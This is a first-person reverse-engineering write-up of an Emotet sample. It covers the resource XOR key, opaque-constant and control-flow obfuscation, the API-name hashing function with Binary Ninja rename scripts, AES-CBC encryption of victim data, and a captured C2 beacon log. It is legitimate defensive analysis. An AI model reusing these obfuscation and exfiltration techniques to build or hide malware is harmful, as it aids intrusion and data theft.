While I managed to accomplish my original goal of deobfuscating the first layer of shellcode, there’s still a lot more to analyze here. At some point, it would be a good idea for me to identify the VM instructions I didn’t understand and write a better disassembler. Additionally, I need to look into how the strings constructed by the VM are actually being used, especially as they seem to relate to antivirus software.
When I took a course in malware analysis last spring, Emotet was the last sample we analyzed. Because it used some fairly advanced obfuscation techniques, I approached it primarily using dynamic analysis, observing network traffic and seeing what new files were created on the system. However, I was never particularly satisfied with this approach, so I decided to revisit Emotet to try and get a better understanding of what it was really doing.
Specifically, I was looking for the following:
Additionally, this analysis was my first attempt at using Binary Ninja scripting. Many of the functions in this sample follow similar patterns in how they are obfuscated, so it was relatively straightforward to write scripts to rename certain types of functions automatically. This turned out to be a huge time saver, and I’ll definitely be using it more going forward.
The sample I used in this analysis was obtained from vx-underground, and its SHA-256 hash is 3d2b0b17521278ba782e6c83e3df068de10ba1560d97e987ed4975ef6796f5cb
.
Looking at the entropy of the given sample, we can immediately see a section with very high entropy:
This appeared to be the same encrypted resource I had encountered when studying Emotet last semester.
The program obfuscates the use of constant values by defining functions that do nothing except return them:
I wrote a short Binary Ninja plugin to search for functions that do nothing except return a single constant value. When the plugin found one, it automatically renamed the function to show the value it returned.
import binaryninja
from binaryninja.types import Symbol
from binaryninja.enums import SymbolType

# rename the functions that return constants with the values they return
def fix_opaque(view):
    for func in view.functions:
        for i in func.hlil:
            #check if the function immediately returns
            if type(func.hlil[0]) == binaryninja.highlevelil.HighLevelILRet:
                if(len(func.hlil[0].operands) == 1):
                    if(type(func.hlil[0].operands[0]) == binaryninja.highlevelil.HighLevelILConst):
                        #rename the function
                        name = 'return_' + str(func.hlil[0].operands[0])
                        s = Symbol(SymbolType.FunctionSymbol, func.start, name)
                        view.define_user_symbol(s)

binaryninja.plugin.PluginCommand.register("Emotet: Fix Opaque Constants", "rename opaque constants with what they return", fix_opaque)
Additionally, some operations are obfuscated by performing unnecessary operations and then reversing them, causing some functions to appear more complicated than they are. In one case, the code appears to divide by 9, then immediately multiply by 9 again.
Upon closer inspection, the function responsible for decrypting the encrypted resource was much less complicated than it appeared. Ignoring all of the unnecessary and unused operations, it appeared to be an XOR using a fixed key.
In fact, looking more closely at the resource, we can directly see what the key must be. The sequence of bytes 35 57 b6 0e 32 52 c2 bc 05 4a 0e 1e df ad 1d fc 40 d8
appears over and over in the resource:
We can guess that these correspond to null bytes in the plaintext, meaning that this sequence of bytes is also the XOR key. Performing the XOR, we find that the encrypted resource is a second DLL, as expected.
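The XOR itself is only a few lines of Python. This sketch assumes the key repeats from the very first byte of the resource, which I am taking for granted here rather than demonstrating:

```python
from itertools import cycle

# the 18-byte sequence that repeats throughout the encrypted resource
KEY = bytes.fromhex('3557b60e3252c2bc054a0e1edfad1dfc40d8')

def xor_decrypt(data, key=KEY):
    """XOR data with a repeating key; applying it twice restores the input."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

# runs of null bytes in the plaintext show up as the key itself
assert xor_decrypt(b'\x00' * 36) == KEY * 2
```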
The original name of this DLL was X.dll
. Notably, this was a different version than the one I studied in my malware analysis course - that sample called itself Y.dll
. However, the core functionality appeared to be much the same.
The program uses a long sequence of if/else instructions to obscure the true order in which the code is run. Every time a set of instructions is run, a state variable is updated with a constant value. Then, this value is checked to determine what segment of code should be run next. As the sequence of state variables has no pattern to it, the true control flow of the program is not at all clear.
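As a toy illustration of this kind of control flow flattening (the state constants and the function are made up, not taken from the sample), the function below computes (x + 1) * 2 but hides the order of its two steps behind a state variable:

```python
def flattened(x):
    state = 0x51c3a7
    while True:
        # the blocks are listed out of order; only the state values
        # determine which one runs next
        if state == 0x7f20d9:
            return x
        elif state == 0x0be412:
            x *= 2
            state = 0x7f20d9
        elif state == 0x51c3a7:
            x += 1
            state = 0x0be412

print(flattened(3))  # 8
```

Recovering the real control flow amounts to following the chain of state values from one block to the next.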
The sequence of state variables is predetermined, so it should theoretically be possible to reconstruct the control flow. I wasn’t able to do this, but I may come back to it once I’m a little more experienced writing plugins for Binary Ninja.
System functions are called by passing a hash of the function’s name to the function sub_1001a607
, which retrieves the correct function based on the hash. Each of the functions from a given library is hashed until a match is found.
I was able to recreate the hashing function being used:
def get_hash(s):
    acc = 0
    for c in s:
        acc = (ord(c) + (acc << 6) + (acc << (((((0x86270b33 // 0x4b) & 0xff) - 0x58) & 0xff) ^ 0xf9)) - acc) & (2**32 - 1)
    return acc ^ 0x39709147
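The constant expression in the second shift is itself obfuscated: it evaluates to 16. With that substituted, the loop has the same shape as the well-known sdbm string hash, with a final XOR applied to the result. The sketch below checks that the simplified version agrees with the one above (get_hash_simplified is my own name for it):

```python
SHIFT = ((((0x86270b33 // 0x4b) & 0xff) - 0x58) & 0xff) ^ 0xf9
assert SHIFT == 16

def get_hash(s):
    # the function as recovered from the sample
    acc = 0
    for c in s:
        acc = (ord(c) + (acc << 6) + (acc << SHIFT) - acc) & (2**32 - 1)
    return acc ^ 0x39709147

def get_hash_simplified(s):
    # sdbm-style update: acc = c + acc * 65599, truncated to 32 bits
    acc = 0
    for c in s:
        acc = (ord(c) + (acc << 6) + (acc << 16) - acc) & 0xffffffff
    return acc ^ 0x39709147

for name in ['LoadLibraryW', 'BCryptEncrypt', 'InternetConnectW']:
    assert get_hash(name) == get_hash_simplified(name)
```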
I then obtained lists of the names of all standard Windows functions that the program might call. From there, it was possible to construct a lookup table for each function and its hash.
Fortunately, the calls to system functions all followed a predictable format. Every call to a system function was wrapped in a helper function that did nothing but return the result of a system function. Additionally, the value of the hash was hard-coded as an argument, which was enough to determine which system function was being called.
In fact, the pattern was predictable enough that it was possible to search for it and rename each of the helper functions automatically in Binary Ninja:
def get_func_from_hash(view):
    func_hash_lookup = {}
    # files containing library function names, separated by newlines
    for name in ['kernel32_strings.txt','bcrypt_strings.txt','ntdll_strings.txt', 'kernelbase_strings.txt']:
        f = open(name).read()
        func_names = f.split('\n')
        for func in func_names: func_hash_lookup[get_hash(func)] = func
    #rename the functions
    get_function = view.get_functions_at(0x10002309)[0]
    for func in get_function.callers:
        #call to get_function is always the last instruction
        if type(func.hlil[-1]) == binaryninja.highlevelil.HighLevelILRet:
            op = func.hlil[-1].operands[0]
            if(type(op) == binaryninja.highlevelil.HighLevelILCall):
                try:
                    #value of hash is the third argument to get_function
                    args = op.operands[0].params
                    func_hash = args[2].value.value
                    try:
                        name = 'do_' + func_hash_lookup[func_hash]
                        s = Symbol(SymbolType.FunctionSymbol, func.start, name)
                        view.define_user_symbol(s)
                    except:
                        print("[Emotet] no hash match found for", func_hash)
                except:
                    print("[Emotet] function doesn't match expected format")
At this point, the system functions were fully deobfuscated. This revealed that sub_1000ac95
was making calls to network-related functions such as InternetConnectW
and HttpOpenRequestW
, and that sub_1000d223
was calling several BCrypt functions. Both of these subroutines seemed worthy of further investigation.
Now that I knew BCrypt was being used, I set a breakpoint at BCryptEncrypt. The second argument to BCryptEncrypt is a pointer to the data to be encrypted. It was difficult to tell what everything in this data buffer was, but it did contain the name of the infected computer, so my guess is that it’s all identifying information of some kind.
The first argument to BCryptEncrypt is a BCRYPT_KEY_HANDLE
struct corresponding to the encryption key. I eventually noticed a 32-byte value that looked like the key itself. This proved to be an AES key, used in CBC mode with an IV of zero.
The program repeatedly attempts to contact its C2 servers on port 80, 443, 7080, or 8080. Each request has a form similar to the following:
[2022-12-24 11:04:38] [65813] [https_443_tcp 67312] [10.0.0.3:44624] connect
[2022-12-24 11:04:38] [65813] [https_443_tcp 67312] [10.0.0.3:44624] recv: GET /jgmVJehRSbWmVZpyyHuYgnsxkTkjFswtLPOWMdaKBjWknn HTTP/1.1
[2022-12-24 11:04:38] [65813] [https_443_tcp 67312] [10.0.0.3:44624] recv: Cookie: XFGojYhNm=qB51M5FmBrQr2QL0h9q0d+j9/0v0yL31buQC3c13xyhOhwig7oSz5qF2J1IproW5k6uhWeKLV0vfQp6DL+d8taRstSvV7syWiYYQ7b0fEv4ka+UYR4Lr4CC9U/UJsYcElg6w1lp9hqLa3YZ1CGybtymAf+RMMC6rGZTrBcRhRHubbqHJw3T3rJ62/DZBuav5+cxsp3mu+laqkR3MfPyVx/jlLnZQODV7JOi2bBTGvVy7cewAqg3owVYcIdRnR92DjVRQOQUikQbCkTwlJ+bKnZ038J3FF+CWjeBOOCAY8BQrTGeMGvGucjgrkzWYDwpQ
The base64-encoded data in the Cookie
header contains the AES-encrypted data discussed earlier. Unfortunately, without knowing what kind of response the C2 server would send back, I wasn’t able to progress further.
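Extracting the raw bytes from a captured request line is straightforward. The sketch below uses a synthetic payload rather than the real capture, and parse_cookie_blob is a name I made up. The cookie is split on the first = only, since base64 padding may contain further = characters.

```python
import base64

def parse_cookie_blob(header_line):
    """Return (cookie name, decoded bytes) from a 'Cookie: name=value' line."""
    _, _, cookie = header_line.partition(':')
    name, _, value = cookie.strip().partition('=')
    return name, base64.b64decode(value)

# synthetic example: 32 bytes standing in for the encrypted data
payload = bytes(range(32))
line = 'Cookie: XFGojYhNm=' + base64.b64encode(payload).decode()
name, raw = parse_cookie_blob(line)
print(name, len(raw))  # XFGojYhNm 32
```

If the data really is AES-CBC output, one would expect the decoded length to be a multiple of the 16-byte block size.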
In the end, I was able to figure out how to do most of the deobfuscation I had wanted to do. Once I discovered the hash function that was being used to call Windows library functions, the sample was much easier to understand. In addition, I’m definitely going to spend more time learning Binary Ninja scripting, as it proved to be extremely helpful for this sample.